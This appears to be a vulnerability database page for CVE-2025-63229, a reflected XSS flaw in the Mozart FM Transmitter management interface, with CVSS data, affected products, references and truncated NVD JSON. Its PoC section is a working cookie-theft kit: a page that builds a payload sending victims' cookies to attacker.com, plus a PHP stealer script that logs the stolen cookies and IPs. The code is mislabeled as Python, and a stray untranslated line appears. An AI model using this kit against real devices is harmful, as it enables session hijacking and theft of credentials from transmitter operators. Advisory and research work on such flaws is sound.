CVE-2025-63229

Description

The Mozart FM Transmitter web management interface on version WEBMOZZI-00287, contains a reflected Cross-Site Scripting (XSS) vulnerability in the /main0.php endpoint. By injecting a malicious JavaScript payload into the ?m= query parameter, an attacker can execute arbitrary code in the victim's browser, potentially stealing sensitive information, hijacking sessions, or performing unauthorized actions.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:dbbroadcast:mozart_next_100_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_100:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_1000_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_1000:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_2000_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_2000:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_30_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_30:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_300_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_300:-:*:*:*:*:*:*:* - NOT VULNERABLE

Mozart FM Transmitter WEBMOZZI-00287 (版本未知)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-63229 PoC - Mozart FM Transmitter Reflected XSS -->
<!-- Target: Mozart FM Transmitter WEBMOZZI-00287 -->
<!-- Endpoint: /main0.php -->
<!-- Attack Vector: ?m= parameter -->

<!-- Basic XSS PoC - Cookie Theft -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-63229 PoC</title>
</head>
<body>
    <h2>CVE-2025-63229 - Mozart FM Transmitter XSS</h2>
    
    <!-- Malicious URL -->
    <p>Attack URL:</p>
    <code id="maliciousUrl"></code>
    
    <script>
        // Generate malicious URL
        var targetHost = prompt("Enter target host (e.g., http://192.168.1.100):", "http://192.168.1.100");
        var maliciousPayload = '<script>document.location="http://attacker.com/steal?c='+encodeURIComponent(document.cookie)+'"</script>';
        var maliciousUrl = targetHost + '/main0.php?m=' + encodeURIComponent(maliciousPayload);
        document.getElementById('maliciousUrl').innerText = maliciousUrl;
        
        // Display link for testing
        document.write('<br><a href="' + maliciousUrl + '" target="_blank">Click to test (simulated)</a>');
    </script>
    
    <!-- Simulated Attack Request -->
    <h3>Attack Request:</h3>
    <pre id="attackRequest"></pre>
    
    <script>
        // Show attack request format
        var requestText = 'GET /main0.php?m=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n' +
                         'Host: target-server\n' +
                         'User-Agent: Mozilla/5.0\n' +
                         'Accept: text/html\n';
        document.getElementById('attackRequest').innerText = requestText;
    </script>
    
    <!-- Stealer Script (attacker-controlled server) -->
    <h3>Cookie Stealer (steal.php):</h3>
    <pre>
<?php
if(isset($_GET['c'])) {
    $cookie = $_GET['c'];
    $ip = $_SERVER['REMOTE_ADDR'];
    $date = date('Y-m-d H:i:s');
    
    // Log stolen cookie
    $log = fopen("cookies.txt", "a");
    fwrite($log, "IP: $ip | Date: $date | Cookie: $cookie\n");
    fclose($log);
    
    // Redirect to legitimate site
    header("Location: http://target/main0.php");
}
?>
    </pre>
    
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63229
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63229
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63229/
[4] VulDB https://vuldb.com/cve/CVE-2025-63229
[5] https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63229_Mozart_FM_Transmitter_xss
[6] https://www.dbbroadcast.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63229", "sourceIdentifier": "[email protected]", "published": "2025-11-18T22:15:51.880", "lastModified": "2025-12-06T00:18:19.227", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Mozart FM Transmitter web management interface on version WEBMOZZI-00287, contains a reflected Cross-Site Scripting (XSS) vulnerability in the /main0.php endpoint. By injecting a malicious JavaScript payload into the ?m= query parameter, an attacker can execute arbitrary code in the victim's browser, potentially stealing sensitive information, hijacking sessions, or performing unauthorized actions."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_100_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2B25533-2EF5-4158-9505-1CD18463DB68"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_100:-:*:*:*:*:*:*:*", "matchCriteriaId": "7834E460-78EE-456A-84F7-0DECE004BD80"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_1000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A3497F7E-0433-444B-A58A-A795C8833966"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "FDEB3E77-E3D8-4878-BBE3-74530F3469B4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_2000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A975C91C-59BD-44AC-9F67-0682CE173738"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_2000:-:*:*:*:*:*:*:*", "matchCriteriaId": "F30F6688-FCDA-4BA5-ABD9-0EB91CDF7631"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_30_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F7B57D15-6192-4D68-9CC5-726E052E7DDD"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_30:-:*:*:*:*:*:*:*", "matchCriteriaId": "EA1C3BA1-3E25-474B-B2A4-97136D6287BA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_300_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F0130D6C-CE17-4046-B0EB-0AD2DA7DC6AC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_300:-:*:*:*:*:*:*:*", "matchCriteriaId": "A04E5386-2B8E-4E5E-9766-CEA4887265D4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_3000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F9F5D088-18AE-4388-83D7-66EBF03B3091"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_3000:-:*:*:*:*:*:*:*", "matchCriteriaId": "E5427DF7-CBAB-4BB9-9175-B7EC7012EAD0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_3500_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "285B4AB4-1F69-445E-B2D3-A0C140B55990"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_3500:-:*:*:*:*:*:*:*", "matchCriteriaId": "90E84970-55F7-41CB-814E-085BACFAAA91"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_50_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "9CD961FB-E86A-4346-9B8D-3658C7BD818F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_50:-:*:*:*:*:*:*:*", "matchCriteriaId": "56699CC2-C823-4397-8C76-BC165E48D6E0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3 ... (truncated)